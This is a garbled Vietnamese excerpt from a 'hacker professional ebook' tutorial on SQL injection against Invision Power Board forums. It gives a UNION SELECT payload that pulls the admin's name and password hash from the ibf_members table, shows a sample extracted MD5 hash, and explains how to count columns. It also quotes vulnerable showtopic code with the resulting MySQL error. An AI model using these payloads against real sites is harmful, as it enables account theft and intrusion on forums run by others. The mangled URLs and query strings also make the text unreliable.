Tham khảo tài liệu 'hacker professional ebook part 222', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | bây giờ thì bạn chỉ cần thay cái gía trị của table ibf_wish_main thành table ibf_members và ở column số 2 thì bạn thay vào đó column tên của admin là name và column thứ 8 password các column của ibf_members thì bạn vào trong phpmyadmin rồi nghiên cứu ở đây mình chỉ hướng dẫn cho các bạn đã biết vè nó rồi OK và bây giờ câu lệnh của nó là http phucducc demo 20SELECT 1 name 3 4 5 6 7 password FROM ibf_members WHERE ID LIKE 1 bạn đã thấy gì chưa Ước nguyện của admin admin đến từ 3 admin ước nguyện vào ngày 2000-00-04 Ước nguyện là 8005125c396680661893d36fc0723158 b. cách thứ 2 là bạn đã kinh nghiệm và như thế thì bạn chỉ cần vào tìm hiểu xem table của cái phần bị lỗi đó có bao nhiêu column và bạn thay dấu bằng từng đó giá trị ở đây là 8 column và sẽ là 1 2 3 4 5 6 7 8 và sau đó lại Run trên Browse để xem column nào hiển thị ra thì thay các giá trị tương ứng vào OK trungthep VNISS Kỹ Thuật tư duy khai thác SQL Injec trong Forum bài 2 2. HACK lỗi ở phần Showtopic Trích else if ibforums- input showtopic ibforums- input act ST ibforums- input t ibforums- input showtopic Grab and cache the topic now as we need the f attr for the skins. nhìn qua ta sẽ thấy là dính lỗi SQL injec ở phần showtopic Ok link bình thường của nó http phucducc demo showtopic 1 và dính lỗi http phucducc demo ssi 1 Trích mySQL query error SELECT t. as forum_name as forum_id as forum_posts as forum_topics as cat_name as cat_id FROM ibf_topics t ibf_forums f ibf_categories c WHERE 1 and and mySQL error You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near at line 6 mySQL error code Date Wednesday 22nd of March